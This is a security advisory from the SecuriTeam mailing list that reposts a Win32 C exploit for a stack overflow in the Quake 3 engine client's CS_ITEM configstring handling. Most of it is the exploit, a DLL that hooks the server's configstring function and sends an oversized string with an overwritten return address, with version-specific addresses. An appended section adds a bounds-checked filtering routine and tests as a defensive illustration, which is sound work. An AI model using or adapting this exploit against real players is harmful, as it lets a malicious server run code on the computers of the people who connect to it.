[EXPL] Quake 3 Engine Client CS_ITEM Stack Overflow (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Quake 3 Engine Client CS_ITEM Stack Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

Improper handling of a server-supplied CS_ITEM configstring in the Quake 3
Engine client allows a malicious server to execute arbitrary code on
connecting clients.

DETAILS

Vulnerable Systems:
* Quake 3 Engine Client

/*
Quake 3 Engine Client CS_ITEM Remote Stack Overflow Exploit (Win32)
Written by RunningBon

E-Mail: runningbon at gmail.com
IRC: irc.rizon.net #kik

This is a DLL, which gets injected into the server exe.

You will need Microsoft Detours library to compile this exploit
(http://research.microsoft.com/sn/detours/)
I recommend you compile this with Microsoft Visual C++

Use this responsibly. You are responsible for any damage you cause using
this.

How it works: sends an oversized Q3 CS_ITEM ConfigString packet to the
client, which goes through a vulnerable function and overflows,
overwriting the stack.

Info:
The engine strips bytes >127, '%', and '\0' before it overflows, so you
will need encoded shellcode and an EIP which doesn't contain any of these
characters.
*/

#include <stdio.h>
#include <windows.h>
#include <detours.h>

struct VersionStruct {
char *pVersionString;
DWORD dwVersionStringAddr;
DWORD dwSetConfigstringAddr;
DWORD dwFillSize;
DWORD dwNewEIP;
int iCS_ITEM;
};

VersionStruct Versions[] = {
{ "Quake 3: Arena", 0x4C1B94, 0x431E70, 836, 0x13333337, 27 },
//Quake 3 Arena 1.32c
{ "Quake 3: Arena", 0x4D2184, 0x438610, 836, 0x13333337, 27 },
//Quake 3 Arena 1.32b
};

VersionStruct *pVersion = NULL;

void (*orig_SV_SetConfigstring)(int iIndex, const char *pVal);
void SV_SetConfigstring_Hook(int iIndex, const char *pVal)
{
char szString[4096];
char *pPtr = NULL;

if(pVersion != NULL)
{
if(iIndex == pVersion->iCS_ITEM)
{
memset(szString, 0, sizeof(szString));
pPtr = &szString[0];

memset(pPtr, 'a', pVersion->dwFillSize);
pPtr += pVersion->dwFillSize;

memcpy(pPtr, (LPVOID)&pVersion->dwNewEIP,
sizeof(DWORD));
pPtr += sizeof(DWORD);

orig_SV_SetConfigstring(iIndex, szString);

return;
}
}

orig_SV_SetConfigstring(iIndex, pVal);
}

BOOL WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)
{
if(dwReason == DLL_PROCESS_ATTACH)
{
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]);
i++)
{

if(!stricmp((char*)Versions[i].dwVersionStringAddr,
Versions[i].pVersionString))
{
pVersion = &Versions[i];
break;
}
}

if(pVersion == NULL)
{
//Could not find correct version
return 1;
}

DetourFunction((BYTE*)pVersion->dwSetConfigstringAddr,
(BYTE*)SV_SetConfigstring_Hook);
_asm mov [orig_SV_SetConfigstring], eax
}

return 1;
}

/* EoF */
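As an added example, not part of the advisory or of RunningBon's exploit code, the following C shows the check the overflowing client path is missing. It applies the same stripping of bytes above 127 and '%' that the advisory describes, but bounds every write to the destination and refuses an over-long configstring outright instead of copying past the end of a fixed stack buffer. The function names, the cs_status values and the 256-byte buffer size are assumptions for illustration; the advisory does not state the size of the engine's real buffer, only that an 836-byte fill plus a 4-byte return address overflows it.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed capacity of the client-side stack buffer that receives the
 * CS_ITEM string; the real engine buffer size is not given in the advisory. */
#define ITEM_CS_CAPACITY 256

enum cs_status {
    CS_OK = 0,              /* string filtered and copied in full */
    CS_REJECT_TOO_LONG = 1, /* filtered text would not fit: refused, dest emptied */
    CS_REJECT_BAD_ARG = 2   /* NULL pointer or zero-size destination */
};

/* Filter and copy a configstring into a fixed-size destination.
 * Bytes above 127 and '%' are dropped (the behaviour the advisory attributes
 * to the engine); a '\0' simply terminates the input as in any C string.
 * Unlike the overflowing path, the destination bound is checked before every
 * write, and an over-long string is refused rather than truncated, so the
 * caller never receives a partial item list. */
enum cs_status set_configstring_checked(const char *in, char *out, size_t out_cap)
{
    const unsigned char *p;
    size_t n = 0;

    if (in == NULL || out == NULL || out_cap == 0)
        return CS_REJECT_BAD_ARG;

    for (p = (const unsigned char *)in; *p != '\0'; p++) {
        if (*p > 127 || *p == '%')
            continue;
        if (n + 1 >= out_cap) {   /* room for this byte plus the terminator? */
            out[0] = '\0';
            return CS_REJECT_TOO_LONG;
        }
        out[n++] = (char)*p;
    }
    out[n] = '\0';
    return CS_OK;
}

/* Constructed input with the same length as the advisory's payload
 * (836 fill bytes plus a 4-byte return address = 840); it must be refused
 * and the destination left empty. */
int oversized_payload_is_rejected(void)
{
    char payload[840 + 1];
    char dest[ITEM_CS_CAPACITY];

    memset(payload, 'a', 840);
    payload[840] = '\0';
    memset(dest, 'x', sizeof dest);   /* pre-fill so clearing is observable */

    return set_configstring_checked(payload, dest, sizeof dest) == CS_REJECT_TOO_LONG
        && dest[0] == '\0';
}

/* Constructed short item bitmap containing a '%' and a two-byte UTF-8
 * character; both must be stripped and the remaining digits kept intact. */
int normal_string_is_filtered_and_kept(void)
{
    char dest[ITEM_CS_CAPACITY];
    const char *sample = "1101%0\xC3\xA9" "11";

    if (set_configstring_checked(sample, dest, sizeof dest) != CS_OK)
        return 0;
    return strcmp(dest, "1101011") == 0;
}

int main(void)
{
    printf("840-byte payload refused: %s\n", oversized_payload_is_rejected() ? "yes" : "no");
    printf("short string kept:        %s\n", normal_string_is_filtered_and_kept() ? "yes" : "no");
    return 0;
}
```

Refusing rather than truncating is deliberate: a silently truncated item bitmap would change which items the client registers, whereas a rejected update is an unambiguous event a client can log as a sign of a hostile or broken server.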


ADDITIONAL INFORMATION

The information has been provided by runningbon (runningbon@xxxxxxxxx).





